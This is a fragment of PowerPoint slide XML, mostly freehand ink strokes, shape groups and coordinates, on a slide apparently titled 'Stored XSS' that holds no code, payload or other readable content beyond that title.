                <a:off x="7023166" y="3424634"/>
                <a:ext cx="7920" cy="86400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="187" name="Freihand 186">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ACC52D-E734-43A8-9DA1-630C51AA5FB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014166" y="3415634"/>
                  <a:ext cx="25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8" name="Freihand 187">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF7E650-99A3-428B-BFF6-8CB1F9D8043D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7030726" y="3352634"/>
                <a:ext cx="4320" cy="24480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="188" name="Freihand 187">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF7E650-99A3-428B-BFF6-8CB1F9D8043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22086" y="3343634"/>
                  <a:ext cx="21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9" name="Freihand 188">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A98570-161C-47FD-972B-B28B58F545A5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7077166" y="3439754"/>
                <a:ext cx="74160" cy="55800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="189" name="Freihand 188">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22A98570-161C-47FD-972B-B28B58F545A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068166" y="3431114"/>
                  <a:ext cx="918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1" name="Freihand 190">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13B5CCFE-4CB1-45A9-BE19-97717F0A0B66}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7244206" y="3316634"/>
                <a:ext cx="127440" cy="170280"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="191" name="Freihand 190">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13B5CCFE-4CB1-45A9-BE19-97717F0A0B6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235206" y="3307634"/>
                  <a:ext cx="145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2" name="Freihand 191">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66FCC015-D26A-417D-A48D-48C593C5DF55}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7406926" y="3374234"/>
                <a:ext cx="101160" cy="106920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="192" name="Freihand 191">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66FCC015-D26A-417D-A48D-48C593C5DF5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398286" y="3365594"/>
                  <a:ext cx="118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3" name="Freihand 192">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DBB594-30CC-45CF-8BFA-1F06335B2B2E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7535086" y="3363074"/>
                <a:ext cx="68400" cy="96480"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="193" name="Freihand 192">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DBB594-30CC-45CF-8BFA-1F06335B2B2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526086" y="3354434"/>
                  <a:ext cx="86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4" name="Freihand 193">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38719957-3BFB-4CDB-9790-9EF8EA0AC802}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7663246" y="3364154"/>
                <a:ext cx="81720" cy="143640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="194" name="Freihand 193">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38719957-3BFB-4CDB-9790-9EF8EA0AC80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654246" y="3355154"/>
                  <a:ext cx="99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C6A5A021-E20B-4369-98C4-FBB58A0E11D9}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7787086" y="3439754"/>
                <a:ext cx="11880" cy="6840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="195" name="Freihand 194">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A5A021-E20B-4369-98C4-FBB58A0E11D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778446" y="3431114"/>
                  <a:ext cx="29520" cy="24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8" name="Gewitterblitz 197">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0902F4-1D4A-4096-9171-DCEE0118B644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3762186" y="3435974"/>
            <a:ext cx="496220" cy="648042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EFE39E35-A73F-4B9F-9AAF-8620867E9C3B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C055820A-B62B-463A-9736-BA3E9429064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19" name="Freihand 218">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{675C6FFD-CA46-498D-BE74-BAA3A6DF6E84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20" name="Freihand 219">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C363D30-548A-46D0-94A1-352D230B97FA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72905692-A2D3-4BC7-A66D-CB3F8AC5DD5A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0CA437B7-468F-4F32-8F40-1BC513F292D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7F37F131-BADF-4810-A699-7C01364A81BC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942FA946-1C71-4797-B59F-7CA07EC68563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30207CAE-8C26-465B-9681-21187AC7719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4C19DD0-84CE-4FB0-8B47-F3B7A72B0BDC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216" name="Freihand 215">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8ADFAE-A574-4C10-B8C7-7C6A42F682C0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210A1344-904A-403A-B8BD-1E46AC31508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A461DABC-CB4E-4F7A-95C1-6D24EC7C4A02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477521AE-0748-4941-846D-CB795909DA7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99" name="Freihand 198">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DCAB406-FED9-4082-AD31-8ECE662E59D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420D0260-6655-4853-AB7E-63FDED26F55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1" name="Gruppieren 200">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF6259EB-E869-4E16-A182-C25D7A51A004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AD730F54-E96B-4406-A97F-2ACD9F0B3663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213" name="Freihand 212">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F02F32D-2E31-4036-9AA5-B62A1789DBB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2" name="Gruppieren 201">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E44C7471-7BC6-42A8-B977-9B42C694AE1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CFEEA8A4-DB80-4AA0-A5A8-4FABD99F824B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7BE53DF5-8028-482C-B538-F90317BB63CD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03" name="Freihand 202">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA214C0-EA8C-4B74-8B17-16ED9E702B1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04" name="Freihand 203">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE76C72D-3E7B-4DA5-AD03-34D5F4375F07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5" name="Gruppieren 204">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F11305C7-AAC3-4622-8602-478F36625157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5E5DB98-E716-4088-86A4-AD37872AFED2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43E1ED8D-11C7-4C74-83E8-999DD4E358DB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208" name="Freihand 207">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA6BE5F-4F9C-480D-808C-A4335872CD44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A6C5CDE0-F918-4106-956A-D07492FB064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B9A5439F-3754-447E-99F3-B0062A7FD85B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5" name="Freihand 224">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE2B64F5-21B8-4160-BDD8-F4F7A24F5EFC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6" name="Freihand 225">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72598D8B-A202-4A9D-8769-A288F76E9EF2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7" name="Freihand 226">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98560795-913B-400D-BE1D-A933B2D6F2D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2D0D822E-9A82-4EB6-98C3-D9742896E8B4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C70F2A99-78F0-4FE5-9124-D9C77051DBA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E26584D2-A4DB-49D8-B14C-1E5606A86C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231" name="Freihand 230">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E6F748-95FD-4B10-92F9-7963698CBA8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363848F7-4BB7-4F36-A816-F4D90B4493B1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233" name="Freihand 232">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03A157FC-87A9-433C-8DFC-9CBE14BE397B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106C53BB-38A1-4F5E-B67C-83D488215F65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235" name="Freihand 234">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{057EF807-3E2C-4DB6-AA4D-81BF56DE095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236" name="Freihand 235">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E83F75C-C768-4BF3-8AF1-4FD4485FB057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237" name="Freihand 236">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{969A62F1-584F-4F0F-BEF6-405D25CAD7B5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238" name="Freihand 237">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C87D154-FB95-4E85-9626-ED0AE0D12576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239" name="Freihand 238">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA077AF7-9B77-4599-8BEF-C24A8A2B75AD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53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86" grpId="0"/>
      <p:bldP spid="19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6C639-4E4E-4141-AF0F-7A4C0A5F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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1039" name="Gruppieren 1038">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05965994-66C4-4C20-A1DB-ACC1EF70C7B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9046787" y="2827323"/>
            <a:ext cx="1824994" cy="1001160"/>
            <a:chOff x="1165452" y="1554434"/>
            <a:chExt cx="1824994" cy="1001160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28CCE68-BEA7-4907-9E7D-EF8CB5D4E3E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2604526" y="1554434"/>
              <a:ext cx="385920" cy="374040"/>
              <a:chOff x="2604526" y="1554434"/>
              <a:chExt cx="385920" cy="37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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2634406" y="1674314"/>
                  <a:ext cx="262440" cy="254160"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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25406" y="1665314"/>
                    <a:ext cx="28008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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2724766" y="1755314"/>
                  <a:ext cx="8280" cy="6840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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716126" y="1746314"/>
                    <a:ext cx="2592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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2798566" y="1763954"/>
                  <a:ext cx="19800" cy="29520"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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89566" y="1754954"/>
                    <a:ext cx="3744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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2740246" y="1809674"/>
                  <a:ext cx="15840" cy="39600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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31606" y="180103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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2674366" y="1870874"/>
                  <a:ext cx="74160" cy="183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665366" y="1861874"/>
                    <a:ext cx="918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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2604526" y="1646594"/>
                  <a:ext cx="385920" cy="54720"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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595886" y="1637594"/>
                    <a:ext cx="40356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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2697766" y="1554434"/>
                  <a:ext cx="214200" cy="12456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688766" y="1545794"/>
                    <a:ext cx="231840" cy="142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6" name="Gruppieren 1025">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1D42FA-146B-4B07-A516-565CCA46E322}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2532166" y="1942874"/>
              <a:ext cx="371520" cy="612720"/>
              <a:chOff x="2532166" y="1942874"/>
              <a:chExt cx="371520" cy="61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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2643406" y="1942874"/>
                  <a:ext cx="75240" cy="47592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634406" y="1933874"/>
                    <a:ext cx="92880" cy="49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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2532166" y="2379194"/>
                  <a:ext cx="131040" cy="176400"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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523166" y="2370554"/>
                    <a:ext cx="14868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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2670406" y="2394674"/>
                  <a:ext cx="162000" cy="147240"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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661766" y="2385674"/>
                    <a:ext cx="1796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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2554126" y="2089034"/>
                  <a:ext cx="120600" cy="114480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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545126" y="2080394"/>
                    <a:ext cx="13824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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2709286" y="2049794"/>
                  <a:ext cx="194400" cy="15408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700286" y="2040794"/>
                    <a:ext cx="21204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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2043740" y="1917214"/>
                <a:ext cx="392040" cy="276120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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34740" y="1908574"/>
                  <a:ext cx="409680" cy="293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38" name="Gruppieren 1037">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372EC0FC-DC80-4021-8178-1503278097E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1165452" y="1818119"/>
              <a:ext cx="756360" cy="493560"/>
              <a:chOff x="1002886" y="1786634"/>
              <a:chExt cx="75636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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1002886" y="1786634"/>
                  <a:ext cx="67320" cy="483840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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93886" y="1777994"/>
                    <a:ext cx="84960" cy="50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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1037086" y="1794554"/>
                  <a:ext cx="567000" cy="39960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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028086" y="1785554"/>
                    <a:ext cx="58464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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1029526" y="2200274"/>
                  <a:ext cx="723600" cy="79920"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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020886" y="2191634"/>
                    <a:ext cx="74124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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1580326" y="1794554"/>
                  <a:ext cx="178920" cy="408600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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71686" y="1785554"/>
                    <a:ext cx="196560" cy="42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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1122766" y="1883834"/>
                  <a:ext cx="70560" cy="74520"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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113766" y="1875194"/>
                    <a:ext cx="8820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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1235806" y="1897154"/>
                  <a:ext cx="92880" cy="55440"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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227166" y="1888154"/>
                    <a:ext cx="11052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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1363246" y="1887794"/>
                  <a:ext cx="306720" cy="85680"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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354246" y="1879154"/>
                    <a:ext cx="32436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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1378726" y="1885994"/>
                  <a:ext cx="291600" cy="51480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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369726" y="1876994"/>
                    <a:ext cx="309240" cy="69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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7209286" y="2960954"/>
              <a:ext cx="1633680" cy="185400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p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200286" y="2951954"/>
                <a:ext cx="16513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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7196686" y="2978234"/>
              <a:ext cx="213840" cy="232560"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p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187686" y="2969594"/>
                <a:ext cx="23148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BB1654B-EB5B-4F60-8E83-1BAC18D5E629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="176866">
            <a:off x="7364446" y="2557754"/>
            <a:ext cx="1788480" cy="311400"/>
            <a:chOff x="7364446" y="2557754"/>
            <a:chExt cx="17884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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7364446" y="2699594"/>
                <a:ext cx="31320" cy="140040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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55446" y="2690594"/>
                  <a:ext cx="48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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7445806" y="2734514"/>
                <a:ext cx="82080" cy="88200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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437166" y="2725874"/>
                  <a:ext cx="99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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7488286" y="2730194"/>
                <a:ext cx="129960" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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79286" y="2721194"/>
                  <a:ext cx="147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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7577566" y="2658194"/>
                <a:ext cx="8280" cy="18360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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68926" y="2649554"/>
                  <a:ext cx="25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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7634806" y="2704994"/>
                <a:ext cx="133560" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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25806" y="2696354"/>
                  <a:ext cx="151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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7778086" y="2699954"/>
                <a:ext cx="133920" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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69086" y="2690954"/>
                  <a:ext cx="151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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7950166" y="2577554"/>
                <a:ext cx="7200" cy="186120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p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41166" y="2568914"/>
                  <a:ext cx="24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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7868806" y="2655674"/>
